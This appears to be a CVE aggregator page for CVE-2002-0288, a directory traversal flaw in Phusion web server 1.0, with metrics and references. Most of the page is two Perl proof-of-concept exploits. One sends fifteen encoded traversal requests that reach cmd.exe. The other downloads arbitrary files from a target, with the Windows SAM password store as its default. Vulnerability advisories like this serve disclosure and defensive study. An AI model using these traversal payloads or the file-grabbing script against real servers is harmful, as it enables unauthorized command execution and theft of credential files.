CVE-2002-0288 : Detail

CVE-2002-0288

2.88%V4
Network
2002-05-03
02h00 +00:00
2016-10-17
11h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 21291

Publication date : 2002-02-15 23h00 +00:00
Author : Alex Hernandez
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4117/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software. This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host. It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. #!/usr/bin/perl # # Simple script to identify if the host is vulnerable!, # # This does 15 different checks based IIS 4-5. Have Fun! # # Phusion Webserver v1.0 proof-of-concept exploit # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_exp.pl <Hosts>:<Port> # # Example: # # perl -x Phusion_exp.pl www.whitehouse.com:80 # Trying..................... # # <THIS HOST IS VULNERABLE> :-) # Check the previous notes to execute bugs. # # use Socket; if ($#ARGV<0) {die " \nPhusion Webserver v1.0 traversal exploit(c)2002. Alex Hernandez al3xhernandez\@ureach.com\n Usage: perl -x $0 www.whitehouse.com:80 {OR}\n [if the host is not using a proxy]\n Usage: perl -x $0 127.0.0.1:80\n\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying.....................\n"; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 2 my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 3 my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 4 my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 5 my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 6 my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 7 my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 8 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 9 my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 10 my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 11 my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 12 my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 13 my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 14 my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 15 my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} #------------------------------ if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n Check the previous notes to execute bugs\n";} else {print "<THIS HOST IS NOT VULNERABLE> :-( \n Check manually on browser...\n";} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); } }
Exploit Database EDB-ID : 21292

Publication date : 2002-02-15 23h00 +00:00
Author : Alex Hernandez
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4117/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software. This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host. It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. #!/usr/bin/perl # # THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN # # Simple script to get files on server. # # Maybe u need this line for windows: # #! c:\perl\bin\perl.exe # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion-GET.pl <And read the Intructions> # # print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); print <<"EOT"; Please type the address remote webserver, example: www.whitehouse.gov [Default remote Webserver is "127.0.0.1"`]: EOT $host = <>; print <<"EOT"; Please type only in the directory where the file is located you want to download, example: /winnt/repair/ [default directory is "/winnt/repair/"] :#For IIS 4-5 EOT $directory = <> || "/winnt/repair/"; print <<"EOT"; Please type in the filename you want download example: sam._ [default file is "sam._"] : EOT $file = <> || "sam._"; { #Maybe u to change this line depending of PATH installation. system("explorer.exe", "http://$host:80/../../..$directory$file"); } print <<"EOT";

Products Mentioned

Configuraton 0

Bbshareware.com>>Phusion_webserver >> Version 1.0

    References

    http://www.securityfocus.com/bid/4117
    Tags : vdb-entry, x_refsource_BID
    http://marc.info/?l=bugtraq&m=101408906001958&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.